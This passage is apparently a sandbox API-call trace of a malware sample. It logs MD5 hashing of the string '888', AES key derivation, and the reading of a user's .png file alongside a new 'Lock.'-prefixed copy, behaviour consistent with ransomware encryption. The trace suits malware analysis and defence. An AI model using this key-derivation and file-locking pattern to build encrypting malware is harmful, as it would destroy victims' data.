lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0121.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f20, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0121.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0121.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6fc0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0121.921] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf440) returned 1 [0121.922] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0121.922] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0121.922] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0121.922] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0121.922] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0121.922] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0121.922] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0121.922] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0121.922] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0121.922] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0121.941] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0121.941] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0121.941] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0121.941] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0121.941] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0121.942] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0121.942] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0121.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa2e8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0121.942] CryptCreateHash (in: hProv=0x9bf440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0121.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0121.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ae8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0121.942] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0121.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0121.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ad8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0121.942] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0121.942] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0121.942] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0121.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa3a8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0121.942] CryptHashData (hHash=0x9a43c0, pbData=0x2a72648, dwDataLen=0x3, dwFlags=0x1) returned 1 [0121.942] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0121.942] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0121.942] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0121.943] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0121.943] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0121.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa4c8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0121.943] CryptDeriveKey (in: hProv=0x9bf440, Algid=0x6601, hBaseData=0x9a43c0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a47c0) returned 1 [0121.944] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0121.944] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0121.944] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0121.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7200, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0121.944] CryptDestroyHash (hHash=0x9a43c0) returned 1 [0121.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7720 [0121.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0121.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0121.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0121.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0121.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0121.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0121.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0121.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0121.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0121.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0121.944] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0121.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa270 [0121.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa528 [0121.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0121.944] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0121.945] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.945] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.945] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0121.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0121.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0121.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0121.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0121.945] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/DjTk 0Dq17Pz4t2AMa.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\djtk 0dq17pz4t2ama.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f0 [0121.945] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.945] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0121.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f80 [0121.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0121.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0121.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0121.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0121.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0121.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0121.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0121.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0121.946] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0121.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0121.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0121.946] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0121.946] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0121.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0121.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0121.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0121.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0121.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0121.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0121.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0121.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0121.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0121.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0121.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0121.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0121.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0121.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0121.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0121.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0121.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0121.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0121.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a684e8 [0121.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0121.947] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0121.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0121.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0121.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0121.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0121.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0121.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0121.947] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.DjTk 0Dq17Pz4t2AMa.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.djtk 0dq17pz4t2ama.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f4 [0121.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7000 [0121.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0121.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0121.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0121.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0121.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0121.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0121.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0121.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0121.948] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0121.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0121.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0121.948] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0121.948] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0121.948] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0121.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0121.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0121.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0121.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0121.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0121.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0121.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0121.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0121.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0121.948] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0121.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0121.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0121.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0121.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0121.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0121.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0121.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0121.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0121.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0121.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0121.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0121.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0121.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0121.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0121.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0121.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0121.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0121.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0121.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0121.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0121.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cd8020 [0121.952] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0121.952] ReadFile (in: hFile=0x4f0, lpBuffer=0x37c0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x37c0048*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0121.954] ReadFile (in: hFile=0x4f0, lpBuffer=0x37c0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x37c0048*, lpNumberOfBytesRead=0x8cf4f8*=0x4d04, lpOverlapped=0x0) returned 1 [0121.954] ReadFile (in: hFile=0x4f0, lpBuffer=0x37c0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x37c0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0121.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0121.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0121.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0121.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0121.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14d04) returned 0x2a8a138 [0121.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cd8020 | out: hHeap=0x2af0000) returned 1 [0121.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0121.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0121.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0121.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0121.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0121.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0121.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0121.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0121.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14d04) returned 0x2aaf410 [0121.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0121.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0121.965] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 